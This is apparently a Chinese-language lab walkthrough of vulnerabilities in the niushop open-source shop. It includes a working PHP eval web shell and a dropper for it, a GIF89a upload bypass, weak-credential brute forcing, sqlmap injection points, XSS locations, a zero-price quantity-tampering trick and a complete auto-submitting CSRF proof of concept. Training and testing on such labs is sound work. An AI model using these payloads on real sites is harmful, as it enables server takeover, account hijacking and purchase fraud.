niushop开源商城靶场漏洞

文件上传漏洞

有很多地方都存在文件上传;有的地方是要校验,加一个GIF89a就可以绕过

先注册一个账号

来到个人信息修改个人头像

选择我们的马

复制代码
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php 
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); 
?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

弱口令

使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

复制代码
#用户名
admin
#密码
admin1

成功登录

SQL注入漏洞

基于布尔时间盲注

第一个存在点

sqlmap跑出来的

第二个存在点

二次外带注入

XSS漏洞

存储型

1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位

反射型

1.后台--微信--消息管理素材管理-->添加消息存储-->标题

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为0.00000001

一共修改两次

后面全部放行就OK了

CSRF漏洞

下载源码;制作修改用户信息链接

修改用户信息

BP抓包;制作SCRF

复制下来制作链接

复制代码
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user&#95;name" value="bbbcdff" />
      <input type="hidden" name="real&#95;name" value="11wsdasa" />
      <input type="hidden" name="birthday" value="1970&#45;01&#45;01" />
      <input type="hidden" name="location" value="'onclick&#61;'alert&#40;1&#41;'" />
      <input type="hidden" name="user&#95;qq" value="2461" />
      <input type="hidden" name="act" value="act&#95;edit&#95;profile" />
      <input type="hidden" name="submit" value="ç&#161;&#174;è&#174;&#164;ä&#191;&#174;æ&#148;&#185;å&#159;ºæ&#156;&#172;ä&#191;&#161;æ&#129;&#175;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

用户在已登录的状态点击我们的链接

相关推荐
还鮟2 小时前
CTF Web的数组巧用
android
小蜜蜂嗡嗡4 小时前
Android Studio flutter项目运行、打包时间太长
android·flutter·android studio
aqi004 小时前
FFmpeg开发笔记(七十一)使用国产的QPlayer2实现双播放器观看视频
android·ffmpeg·音视频·流媒体
zhangphil6 小时前
Android理解onTrimMemory中ComponentCallbacks2的内存警戒水位线值
android
你过来啊你6 小时前
Android View的绘制原理详解
android
移动开发者1号9 小时前
使用 Android App Bundle 极致压缩应用体积
android·kotlin
移动开发者1号9 小时前
构建高可用线上性能监控体系:从原理到实战
android·kotlin
ii_best14 小时前
按键精灵支持安卓14、15系统,兼容64位环境开发辅助工具
android
美狐美颜sdk14 小时前
跨平台直播美颜SDK集成实录:Android/iOS如何适配贴纸功能
android·人工智能·ios·架构·音视频·美颜sdk·第三方美颜sdk
恋猫de小郭18 小时前
Meta 宣布加入 Kotlin 基金会,将为 Kotlin 和 Android 生态提供全新支持
android·开发语言·ios·kotlin